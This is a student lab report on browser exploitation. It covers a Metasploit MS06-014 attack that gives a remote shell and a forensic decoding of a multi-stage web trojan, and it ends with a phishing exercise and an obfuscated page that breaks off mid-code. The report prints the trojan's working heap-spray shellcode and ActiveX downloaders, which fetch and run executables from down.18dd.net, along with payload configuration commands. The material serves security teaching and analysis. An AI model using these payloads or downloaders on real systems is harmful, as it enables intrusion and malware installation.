20232903 2023-2024-2 "Network Attack and Defense Practice" Practice 11 Report


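I. Practice content

1. Web browser penetration attack

Task: use an attacker machine and a Windows target to carry out a browser penetration attack experiment, and experience the actual process of constructing a web trojan and carrying out a browser attack.

Experiment steps:
(1) Select the MS06-014 exploit module in Metasploit
(2) Set PAYLOAD to any remote shell connection
(3) Set the server address and URL parameters, run exploit, and construct the malicious web trojan script
(4) Start the browser in the target environment, verify connectivity with the server, and visit the URL of the malicious web trojan script
(5) Check the state of the attack in Metasploit on the attacker machine, and execute commands remotely on the target through the remote-control SESSION established after successful exploitation

2. Forensic analysis practice: web trojan attack scenario analysis

Web trojan: a page that is disguised as an ordinary web page file, or a normal web page file into which malicious code has been inserted directly. When someone visits it, the web trojan exploits a vulnerability in the visitor's system or browser to automatically download the preconfigured trojan server component to the visitor's computer and run it.

Task: visit start.html, decrypt the htm page it leads to, take the 32-digit MD5 hash of each file address, and download the corresponding file from http://192.168.68.253/scom/hashed/<hash value>, using the hash value as the file name. Depending on the decrypted address, either keep decrypting or do static disassembly or dynamic debugging, until all files have been analyzed.

Experiment steps:
(1) Visit start.html; this file gives the address of new09.htm.

(2) After entering the htm page, for every file address that is decrypted, take its 32-digit MD5 hash and download the corresponding file from http://192.168.68.253/scom/hashed/<hash value>, using the hash value as the file name (note: the letters in the file name are lowercase and there is no extension). This is the file that corresponds to the decrypted address.

(3) If the decrypted address points to a web page or script file, continue decrypting.

(4) If the decrypted address is a binary program file, do static disassembly or dynamic debugging.

(5) Repeat the process until all of these files have been analyzed.

3. Attack and defense practice: web browser penetration attack and defense

Attacker task: use Metasploit to construct exploit code for at least two different security vulnerabilities in web browser software, obfuscate it, assemble it into one URL, and send it to the defender in a deceptive e-mail.

Defender task: extract the trojan link from the e-mail, deobfuscate and analyze it, try to recover the original form of the exploit code, and determine which security vulnerabilities in which web browser software the exploit code targets.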

II. Practice process

1. Web browser penetration attack

Attacker: Kali 192.168.200.3
Target: Win2k 192.168.200.2

On Kali, open Metasploit with sudo msfconsole, search msf for MS06-014, and use this exploit module:

search MS06-014

Set and run the payload (commands as follows):

set payload generic/shell_reverse_tcp
set RHOST 192.168.200.8
set LHOST 192.168.200.3
exploit

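This started the malicious page http://192.168.200.3:8080/0v4UH3.

Visiting that URL from the Win2k target returns the string biRjfEyLPLWROYDPmlhGd.

Back on Kali, the session has been created successfully.

The attacker now has a session. Enter the command sessions -i 1 to select session 1 and get a shell, from which the target's IP can be viewed: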

sessions
sessions -i 1
ipconfig

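The attack succeeded.

2. Forensic analysis practice: web trojan attack scenario analysis

(1) Find the four hashes

Searching the file for new09.htm finds two occurrences. new09.htm is referenced with a relative path.

Compute the hashes of the two js files in the new page.

Opening the files named by these two hash values reveals an XXTEA decryption step.
The file 23180a42a2ff1192150231b44ffdf3d3 contains only a comment.

Recover the XXTEA key. Converting the key \x73\x63\x72\x69\x70\x74 from hexadecimal to a string shows that it stands for the string script.

With script as the key, use an online XXTEA encryption/decryption tool to decrypt the very long string.

Convert the hexadecimal parts of the decrypted result to a string: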

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

Analysis of the code above shows that it uses external-call vulnerabilities in "Adodb.Stream" (Microsoft data access object), "MPS.StormPlayer" (Baofeng Storm player), "POWERPLAYER.PowerPlayerCtrl.1" (PPStream) and "BaiduBar.Tool" (Baidu Sobar).

Compute the MD5 of the four vulnerabilities (four js files) to get the hash values of the four referenced files:

MD5 of http://aa.18dd.net/aa/1.js: 5d7e9058a857aa2abee820d5473c5fa4

MD5 of http://aa.18dd.net/aa/b.js: 3870c28cc279d457746b3796a262f166

MD5 of http://aa.18dd.net/aa/pps.js: 5f0b8bf0385314dbe0e5ec95e6abedc2

MD5 of http://down.18dd.net/bb/bd.cab: 1c1d7b3539a617517c49eee4120783b2

(2) Analyze the four hashes and find the four exe files

For the 5d file, decoding shows that it executes 014.exe:

var url="http://down.18dd.net/bb/014.exe";
try{
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path="..\\ntuser.com";
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c "+path,"","open",0)
}catch(e){}

For the 38 file, first apply Packed decoding. Then decode the result using the characteristic of a URL (0x2f is /), which shows that it uses bf.exe.

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 1=29("%10%10");5 26=20;5 14=29("%82%3"+"%81%10%83%84%87%3%86%85"+"%79%78%72%22%71%70%69%73"+"%74%77%17%76%75%88%89%103"+"%17%102%101%104%105%108%107%106"+"%100%99%93%92%25%91%68%94"+"%95%98%97%25%96%109%63%37"+"%31%39%41%40%19%42%43%45"+"%38%3%44%46%35%12%32%22"+"%33%36%34%3%19%67%61%60"+"%59%62%47%66%65%64%58%57"+"%16%24%51%50%49%24%48%16"+"%52%53%56%55%54%90%152%168"+"%167%166%165%110%170%173%12%172"+"%171%164%12%157%156%155%154%158"+"%159%162%161%160%175%185%189%188"+"%187%191%193%195%194%23%192%190"+"%186%179%178%177%176%180%181%184"+"%183%182%174%153%18%11%125%124"+"%15%123%122%126%127%130%21%129"+"%128%121%120%114%18%11%113%112"+"%111%115%116%119%118%117%21%131"+"%132%146%11%144%147%148%151%150%149%143%142%136%23%135%134%133%137%15%3");5 4=26+14.6;13(1.6<4)1+=1;28=1.30(0,4);2=1.30(0,1.6-4);13(2.6+4<138)2=2+2+28;27=141 140();139(7=0;7<169;7++)27[7]=2+14;5 
8=\'\';13(8.6<145)8+="\\9\\9\\9\\9";163.80(8)',10,196,'|bigblock|block|u0000|slackspace|var|length|x|buffer|x0a|u9090|u0041|u57ff|while|shellcode|u6578|u4320|ufb03|u7972|uc683||u6461|ud88b|u7465|u4343|u468b|headersize|memory|fillblock|unescape|substring|u008b|u5afc|u016a|u0057|u5652|ue859|uc103|u6ae8|uc303|uf78b|ufa8b|u8b0e|u6ad0|u8300|u5904|u0dc6|u5e80|u03c6|u632f|u03c7|u6643|u206a|uff53|u5c03|u04c7|uec57|u646d|u6303|ufa75|u803e|u8046|u3680|u02e1|uc7dc|u8b40|uec83|u5613|ud1c3|u1e74|u8b3c|u738b|u0840|u0378|u8bf3|u3314|u4e8b|u207e|u8bad|u1c70|rawParse|u9000|uf3e9|u5a90|ua164|u8b0c|u408b|u0030|u56ed|u5157|u2e61|u0324|ucd8b|u5e5f|u03e1|u33c1|u031c|u088b|u66c9|u59e9|ue245|u0e6a|uf28b|u3f8b|uf359|u74a6|ufcef|u835f|u5908|uc1c3|u50c0|u6e6f|u6d6c|u7275|u6172|u5500|u4c52|u6f6c|u6e77|u6f44|u6269|u4c64|u7845|u0063|u456e|u6957|u7469|u6854|u616f|u4c00|u6572|u6f54|u6946|u6662|u2f62|u622f|u6e2e|u652e|0x40000|for|Array|new|u6464|u3831|u7468|4068|u656c|u7074|u2f3a|u2e6e|u776f|u642f|uc765|u6f74|uff58|u0040|u2451|u68f0|u33d0|uacc0|u5251|uf975|uc085|storm|u5300|u3300|u0065|u7804|u0344|300|u5350|u6adc|u8bfc|u5056|u6365|u5356|u6547|u0073|u7365|u7264|u5374|u7379|u7269|u446d|u6574|ud2ff|u6441|u33ee|ue2ab|u595a|u636f|uc3c0|u7250|u0ce8|u47ff|uffff'.split('|'),0,{}))

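We use the 工具猫 toolbox of common web encryption and decryption tools. It provides online MD5 and online SHA1 hashing, as well as online BASE64, online ESCAPE, online Packed encoding and decoding, URI encoding, URIComp encoding, Unicode encoding, URI decoding, URIComp decoding, Unicode decoding and similar functions; in short, it is an encryption and decryption toolbox.
We choose the Packed decode operation, with lowercase output, a hexadecimal character set, and 8 bits (ASCII) per character.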

var bigblock=unescape("%u9090%u9090");var headersize=20;var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<300;x++)memory[x]=block+shellcode;var buffer='';while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";storm.rawParse(buffer)
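
The Packed decoding step above can also be done offline, treating the packed script purely as text so that the sample never runs. The following JavaScript is an added example, not code from the original report or from the packer's author; the function names are assumptions, and the sample is constructed to mirror the first and last statements of the packed b.js above.

```javascript
// Added example: unpack Dean Edwards "p,a,c,k,e,d" JavaScript by parsing it
// as text. The sample is never passed to eval().

// Digit alphabet the packer uses for dictionary indexes (radix 2..62).
const DIGITS = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';

// Undo the \' and \\ escaping of the single-quoted payload literal.
function unescapeSingleQuoted(literal) {
  return literal.replace(/\\(['\\])/g, '$1');
}

// Map a payload token to its dictionary index; -1 if the token is not a
// valid number in the given radix (for example an identifier with "_").
function tokenToIndex(token, radix) {
  let n = 0;
  for (const ch of token) {
    const d = DIGITS.indexOf(ch);
    if (d < 0 || d >= radix) return -1;
    n = n * radix + d;
  }
  return n;
}

// Returns { radix, count, words, source }, or null when the text does not
// contain the packer's ('payload',radix,count,'a|b|c'.split('|') call tail.
function unpack(packed) {
  const tail = /\}\('([\s\S]*)',\s*(\d+),\s*(\d+),\s*'([\s\S]*?)'\.split\('\|'\)/;
  const m = tail.exec(packed);
  if (!m) return null;
  const radix = Number(m[2]);
  if (radix < 2 || radix > DIGITS.length) return null;
  const words = m[4].split('|');
  // An empty dictionary slot means "keep the token as written".
  const source = unescapeSingleQuoted(m[1]).replace(/\b\w+\b/g, (token) => {
    const i = tokenToIndex(token, radix);
    return i >= 0 && i < words.length && words[i] !== '' ? words[i] : token;
  });
  return { radix, count: Number(m[3]), words, source };
}

// Constructed sample (packer stub body omitted; only the call tail matters).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* stub omitted */return p}('3 1=2("%4%4");3 5=\'\';6(5.7<8)5+="\\9\\9";',10,10,'|bigblock|unescape|var|u9090|buffer|while|length|4068|x0a'.split('|'),0,{}))`;

console.log(unpack(SAMPLE).source);
```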

Decode the string in the 5f file first, which gives the path http://down.18dd.net/bb/pps.exe

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer
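
The decoding steps in this section (the \x73\x63... key that reads script, the octal escapes such as \57\52\45\165 that wrap the 5f file, and the 0x2f hint used to read a URL out of the %u blob) can all be done as plain text processing. The following JavaScript is an added example, not code from the original report; the function names are assumptions, and the input is an excerpt of the decoded b.js shellcode string shown above, trimmed to start at %u4c00.

```javascript
// Added example: decode the escape layers of the sample as text and list the
// strings hidden in the %u-encoded blob. Nothing is executed or downloaded.

// Resolve \xHH, \uHHHH and legacy octal (\0 to \377) escapes.
// Other escapes such as \n or \\ are left untouched.
function decodeJsEscapes(text) {
  const re = /\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([0-3][0-7]{2}|[0-7]{1,2}))/g;
  return text.replace(re, (whole, hex, uni, oct) =>
    String.fromCharCode(oct !== undefined ? parseInt(oct, 8) : parseInt(hex || uni, 16)));
}

// unescape("%uXXXX") yields one UTF-16 code unit per group; in memory each
// unit is stored low byte first, so %u7468 becomes the bytes 68 74 ("ht").
// Text between groups (quotes, "+") is skipped.
function percentUToBytes(text) {
  const bytes = [];
  for (const m of text.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return Uint8Array.from(bytes);
}

// Printable-ASCII runs of at least minLen bytes (like the strings utility).
function asciiStrings(bytes, minLen = 4) {
  const found = [];
  let run = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) {
      run += String.fromCharCode(b);
    } else {
      if (run.length >= minLen) found.push(run);
      run = '';
    }
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// Full pass over one script layer: escapes -> bytes -> strings -> URLs.
function analyzeLayer(text) {
  const strings = asciiStrings(percentUToBytes(decodeJsEscapes(text)));
  const urls = strings.flatMap((s) => s.match(/https?:\/\/[^\s"'<>]+/gi) || []);
  return { strings, urls };
}

// Excerpt from the end of the shellcode string in the decoded b.js above.
const B_JS_TAIL = '"%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+' +
  '"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+' +
  '"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e' +
  '%u7465%u622f%u2f62%u6662%u652e%u6578%u0000"';

console.log(decodeJsEscapes('\\x73\\x63\\x72\\x69\\x70\\x74')); // the XXTEA key
console.log(analyzeLayer(B_JS_TAIL));
```

The strings that come out are the API names the shellcode resolves and the download URL, which is how the bf.exe path is read from the blob.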

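The file 1c1d7b3539a617517c49eee4120783b2.zip is an archive; extracting it in the virtual machine yields a bd.exe file.

(3) Analyze the four exe files

Get the MD5 values of the files that the first three files download:

http://down.18dd.net/bb/014.exe MD5: ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe MD5: 268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe MD5: ff59b3b8961f502289c1b4df8c37e2a4

We now have four exe files (014.exe, bf.exe, pps.exe, bd.exe). Locating the corresponding files in the resources shows that the four files have the same size; computing the MD5 hash of the file contents leads to the conclusion that these four files are identical.

Take one of them as an example and analyze it by disassembling it with IDA.

Import table operations:
Here, the function writefsdword writes memory to the location given by an offset relative to the start of the FS segment.

File download operations:
The strings window contains links for downloading .exe files, which may be used to download trojans.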

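3. Attack and defense practice: web browser penetration attack and defense

The attacker uses Metasploit to construct exploit code for at least two different security vulnerabilities in web browser software, obfuscates it, assembles it into one URL, and sends it to the defender in a deceptive e-mail.

The defender extracts the trojan link from the e-mail, deobfuscates and analyzes it, tries to recover the original form of the exploit code, and determines which security vulnerabilities in which web browser software the exploit code targets.

(1) Attack

Attacker: 20232903
Defender: 20232937

Search msf for Firefox vulnerabilities and use 34.

Configure the payload and run the attack: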

set payload windows/shell/bind_tcp
set URIPATH /
run

Set up the phishing e-mail.

After the victim clicks, the attack succeeds.

(2) Defense

Attacker: 20232937
Defender: 20232903

Clicking the phishing e-mail pops up a dialog box.

  <script>
  var N={"\u005f\153\145\x79\u0053\x74\162":(function () { var sq="9+/=",oP="345678",I="hijklmnopqrstuvwxyz012",b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg"; return b+I+oP+sq })(),"\137\u0075\x74\u0066\u0038\u005f\145\u006e\143\u006f\u0064\145":function(x){x=x[((function () { var jM="ce",m="la",cs="rep"; return cs+m+jM })())](/\r\n/g,String.fromCharCode(92,0x6e));var W="";var S_;for(S_=('XsCxjWSWP'.length-9);S_<x[(String.fromCharCode(0x6c,101,0156,0x67,0164,104))];S_++){var V=x[((function () { var h="t",nY="odeA",XH="C",JG="r",$="cha"; return $+JG+XH+nY+h })())](S_);if(V<(0x1*74+54)){W+=String[((function () { var o$="ode",WA="rC",A="fromCha"; return A+WA+o$ })())](V);}else if((V>('u'.length*105+22))&&(V<('ww'.length*(01*('x'.length*(0x2*0xca+43)+269)+251)+114))){W+=String[(String.fromCharCode(0146,0162,111,109,0x43,0x68,0x61,0162,0103,0157,0144,0145))]((V>>'wjBNpq'.length)|('T'.length*0201+63));W+=String[(String.fromCharCode(0x66,0x72,111,0x6d,0103,0x68,0141,0162,0103,0x6f,0x64,0x65))]((V&(0xc*'NpJlK'.length+3))|(2*('t'.length*('T'.length*('HD'.length*8+6)+12)+24)+12));}else {W+=String[((function () { var hz="rCode",Z="fromCha"; return Z+hz })())]((V>>(0x3*4+0))|('w'.length*(03*(0x1*051+21)+4)+34));W+=String[((function () { var s="ode",S="rC",ro="fromCha"; return ro+S+s })())](((V>>'dnqbDf'.length)&(1*60+3))|(01*('w'.length*50+27)+51));W+=String[(String.fromCharCode(102,0x72,0157,0x6d,0103,0x68,0141,114,67,111,0x64,101))]((V&('I'.length*0x2d+18))|(1*93+35));}}return W;},"\145\156\143\x6f\x64\u0065":function(x){var V="";var yw,bF,$,q7,zF,C,m9;var o=('DAF'.length-3);x=N[((function () { var P="code",BY="n",H="f8_e",Xe="t",W="_u"; return W+Xe+H+BY+P })())](x);while(o<x[((function () { var NC="th",B2="g",mK="len"; return mK+B2+NC })())]){yw=x[((function () { var JC="t",nw="CodeA",r="char"; return r+nw+JC })())](o++);bF=x[(String.fromCharCode(0x63,0150,97,0x72,0x43,111,0144,0x65,0x41,116))](o++);$=x[((function () { var q0="t",t="deA",jN="charCo"; return jN+t+q0 
})())](o++);q7=yw>>'iL'.length;zF=((yw&'Wii'.length)<<'ykxw'.length)|(bF>>'rWqT'.length);C=((bF&('lMN'.length*'mGfZ'.length+3))<<'Qe'.length)|($>>'WdqfNV'.length);m9=$&(02*0x1b+9);if(window[(function () { var ZM="aN",R="isN"; return R+ZM })()](bF)){C=m9=('b'.length*('L'.length*0x1a+10)+28);}else if(window[String.fromCharCode(0151,0163,0x4e,0x61,78)]($)){m9=(0x1*('V'.length*('BDBRGi'.length*5+4)+25)+5);}V=V+this[(String.fromCharCode(95,0153,0145,121,0x53,116,114))][(String.fromCharCode(99,0x68,0x61,0x72,65,116))](q7)+this[((function () { var Hl="r",Ps="eySt",ZQ="k",EY="_"; return EY+ZQ+Ps+Hl })())][((function () { var We="t",o2="arA",iG="ch"; return iG+o2+We })())](zF)+this[((function () { var Yc="r",to="eySt",FF="k",QF="_"; return QF+FF+to+Yc })())][(String.fromCharCode(99,0x68,0x61,0x72,0x41,116))](C)+this[(String.fromCharCode(0137,0153,101,0171,0123,116,114))][(String.fromCharCode(0143,0150,97,0162,0x41,0x74))](m9);}return V;},"\x64\145\u0063\u006f\u0064\145":function(x){var B2="";var e,X,D;var vr,HY,pg,w;var l=('IXA'.length-3);x=x[((function () { var s="e",lv="c",An="pla",d="re"; return d+An+lv+s })())](/[^A-Za-z0-9\+\/\\=]/g,"");while(l<x[((function () { var kV="th",F$="leng"; return F$+kV })())]){vr=this[((function () { var Px="tr",W_="keyS",j="_"; return j+W_+Px })())][(String.fromCharCode(0x69,110,0144,0x65,120,0117,0146))](x[(String.fromCharCode(0143,0x68,0141,0x72,0101,0164))](l++));HY=this[(String.fromCharCode(0x5f,0153,0x65,0x79,0123,0x74,0162))][((function () { var x8="exOf",Sm="ind"; return Sm+x8 })())](x[((function () { var S="t",Nh="rA",z="cha"; return z+Nh+S })())](l++));pg=this[(String.fromCharCode(0137,0x6b,101,0x79,0x53,0164,0x72))][((function () { var u="f",pt="xO",CN="de",Od="in"; return Od+CN+pt+u })())](x[((function () { var W="At",Q2="char"; return Q2+W 
})())](l++));w=this[(String.fromCharCode(95,0153,0x65,121,0123,0164,0162))][(String.fromCharCode(0x69,110,100,0x65,0170,0117,102))](x[(String.fromCharCode(0143,104,0x61,0x72,65,0164))](l++));e=(vr<<'YA'.length)|(HY>>'JOIl'.length);X=((HY&('sJWKnrH'.length*'Fh'.length+1))<<'gLqM'.length)|(pg>>'YQ'.length);D=((pg&'vQQ'.length)<<'xHEKuq'.length)|w;B2=B2+String[((function () { var kg="e",t="CharCod",J="om",ZO="fr"; return ZO+J+t+kg })())](e);if(pg!=(2*26+12)){B2=B2+String[(String.fromCharCode(102,0x72,0x6f,0155,67,104,0141,0x72,67,0157,0144,0145))](X);}if(w!=('u'.length*38+26)){B2=B2+String[((function () { var C="Code",Iq="romChar",PZ="f"; return PZ+Iq+C })())](D);}}B2=N[((function () { var hB="ode",gB="f8_dec",S="_ut"; return S+gB+hB })())](B2);return B2;},"\x5f\165\164\u0066\70\137\u0064\145\u0063\157\x64\x65":function(s){var Bk="";var m=('DyABkEMBkY'.length-10);var ck=('KfNu'.length-4);var j=('jqtQr'.length-5);var Q=('gEimp'.length-5);while(m<s[((function () { var C="th",um="g",$x="len"; return $x+um+C })())]){ck=s[((function () { var PL="deAt",AY="charCo"; return AY+PL })())](m);if(ck<('SC'.length*(3*16+1)+30)){Bk+=String[(String.fromCharCode(0x66,0x72,0157,0x6d,67,0150,97,0x72,67,0157,0144,101))](ck);m++;}else if((ck>('cXZ'.length*(('dVP'.length*3+2)*0x5+1)+23))&&(ck<(02*101+22))){j=s[((function () { var sR="odeAt",Z="arC",D="ch"; return D+Z+sR })())](m+'y'.length);Bk+=String[(String.fromCharCode(0x66,0162,0x6f,109,67,0x68,97,0162,0x43,0157,100,0145))](((ck&('yTc'.length*0x9+4))<<'tFONJw'.length)|(j&(0x2*0x1f+1)));m+='pU'.length;}else {j=s[((function () { var KX="At",nM="de",DH="charCo"; return DH+nM+KX })())](m+'E'.length);Q=s[((function () { var $="deAt",D$="charCo"; return D$+$ })())](m+'Lk'.length);Bk+=String[(String.fromCharCode(0146,0162,111,0x6d,0x43,0150,0x61,0x72,67,111,100,0145))](((ck&((01*'VvUcBnbU'.length+7)*'V'.length+0))<<(014*'R'.length+0))|((j&(0x1*077+0))<<'POfoqh'.length)|(Q&(01*('zdJR'.length*(05*'Wh'.length+0)+2)+21)));m+='bDN'.length;}}return 
Bk;}};var y=String.fromCharCode(0117,112,0145,0x72,97);var k=String.fromCharCode(0x4d,0123,0x49,69);var M=String.fromCharCode(0106,0x69,0162,0145,0x66,0x6f,120);var q=String.fromCharCode(67,104,0162,111,109,0145);var v=String.fromCharCode(0123,0x61,0146,97,0x72,0x69);var g=(function () { var m="x",P="u",A="n",w="i",mi="L"; return mi+w+A+P+m })();var L=String.fromCharCode(65,0x6e,0x64,0x72,111,105,0144);var O=String.fromCharCode(0127,0x69,0x6e,0x64,0157,0167,0163);var F=String.fromCharCode(0x4d,97,0x63,0x20,0117,0x53,040,0x58);var B=(function () { var j="S",o="O",Z="i"; return Z+o+j })();var f=String.fromCharCode(0x46,0162,0145,0x65,0x42,83,0104);var a=(function () { var M7="SD",H="B",RU="t",nP="Ne"; return nP+RU+H+M7 })();var c=String.fromCharCode(0x4f,0x70,0x65,110,0102,0123,68);var i=String.fromCharCode(0141,0162,0155,108,0x65);var n=String.fromCharCode(0x78,0x38,54);var oQ=(function () { var Q="4",a$="86_6",C="x"; return C+a$+Q })();var nE=String.fromCharCode(0160,0160,99);var p=String.fromCharCode(109,105,0160,0163,0x6c,101);var Z1={};Z1[((function () { var V="n",uq="Versio",EP="get"; return EP+uq+V })())]=function(){var NZ;var vm;var l;var r;var cp;var $T;var RF;var DZ;var W="";var J=navigator[(String.fromCharCode(117,0x73,0x65,0162,65,103,0145,110,116))];var v5=false;var qu="";var e=null;var D=function(By,Qa,N0){if(!document[((function () { var Cy="ment",Qh="e",l3="l",Zb="createE"; return Zb+l3+Qh+Cy })())])return false;var FV=document[((function () { var Mm="t",F_="en",t="ateElem",v7="cre"; return v7+t+F_+Mm })())]((function () { var ke='v',r7='i',og='d'; return og+r7+ke })());FV[((function () { var iC="e",Gj="ibut",k7="setAttr"; return k7+Gj+iC })())]((function () { var _$='le',xC='y',xY='st'; return xY+xC+_$ })(),By+(function () { var h1=" ",K2=":"; return K2+h1 })()+N0+(function () { var d=";"; return d })());return FV[((function () { var My="e",PY="yl",fD="t",UJ="s"; return UJ+fD+PY+My })())][Qa]===N0;};var h=function(St){if(!document[((function () { var 
